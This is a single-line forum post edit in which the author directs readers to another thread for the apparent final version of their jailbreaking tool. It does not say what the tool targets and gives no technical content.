    Edit 11: Please see THIS THREAD for what I believe will be the final version of my jailbreaking tool.